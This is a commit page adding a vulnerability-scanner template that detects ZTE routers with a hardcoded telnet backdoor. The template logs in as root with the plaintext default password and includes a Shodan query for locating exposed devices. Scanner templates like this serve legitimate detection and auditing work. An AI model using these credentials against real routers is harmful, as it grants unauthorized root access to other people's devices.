Merge pull request #5412 from its0x08/patch-2

feat: Added `zte-backdoor` template
patch-1
Prince Chaddha 2022-09-21 00:07:58 +05:30 committed by GitHub
commit 473ef998d9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: backdoored-zte
info:
name: Backdoored ZTE Routers
author: its0x08
severity: high
description: |
Multiple ZTE routers have a telnet hardcoded backdoor account that spawns root shell.
reference:
- https://www.exploit-db.com/ghdb/7179
metadata:
verified: true
shodan-query: http.html:"ZTE Corporation"
tags: network,zte,telnet,backdoor,router
network:
- host:
- "{{Hostname}}"
- "{{Host}}:23"
inputs:
- data: "root\r\n"
- data: "Zte521\r\n\r\n"
read: 1024
matchers:
- type: word
words:
- "BusyBox"
extractors:
- type: regex
regex:
- '[A-Z]{1,}[0-9]{3,4}'